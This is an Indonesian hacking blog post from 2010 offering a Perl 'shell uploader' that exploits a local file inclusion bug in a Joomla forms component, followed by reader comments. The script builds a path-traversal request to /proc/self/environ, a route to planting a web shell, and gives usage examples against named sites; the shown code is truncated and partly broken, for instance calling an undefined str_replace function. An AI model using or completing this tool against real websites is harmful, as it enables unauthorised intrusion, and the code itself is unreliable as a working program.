Laman

Berita Terkini : Film Indonesia

Minggu, 26 Desember 2010

Simple Shell Uploader via LFI

################################
### Simple Shell Uploader via LFI Bugz
### Version 1.0
### edit By Arch_fajri
### arch_fajri@yahoo.co.id
### http://lampunghacker.blogspot.com
### Google@allnetwork
### Desember @ 2010
################################

#!/usr/bin/perl -w

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

if (@ARGV != 3) { print "\n [!] perl $0 \n"; exit(); }

$host = $ARGV[0];
$path = $ARGV[1];
$lfibug = $ARGV[2];
$environ = '../../../../../../../../../../../../../../../proc/self/environ';

if ($host =~ /http:\/\// ) { $host = str_replace($host,"http:\/\/",''); }

$xpl = $host.$path.$lfibug.$environ;

---------------------------------------------------------
Contoh cara pengguanaan
  • perl lampunghacker.txt lampungcyber.org / "index.php?option=com_ckforms&controller=" atau
  • perl lampunghacker.txt lampungcyber.web.id /pcprintersolutixxx/ "index.php?option=com_ckforms&controller="
---------------------------------------------------------
Download di sini
Sumber : antisecurity

3 komentar:

  1. Hahaha.... Sudah jadi Hacker loe.... Masih ingat aku gak...? Aku "SaprOL" yang dulu sempat jahilin (nge-Drop) Nick kamu "Arch_Fajri" di Allnetwork #jmirc. oh ya.. Nickku ganti "RafaNet"
    Mampir di situsku ya kawan...
    http://toyomarto.com.nu

    BalasHapus
  2. haha.... masih inget.saya bukan hacker om. cuman belajar ngeblog. bikin nama biar soe nya bisa dapet. xixixi

    BalasHapus
  3. Hey.. mas bro.. kalo butuh bikin web.. mampir di Webku ya.. http://www.rafanet.com

    BalasHapus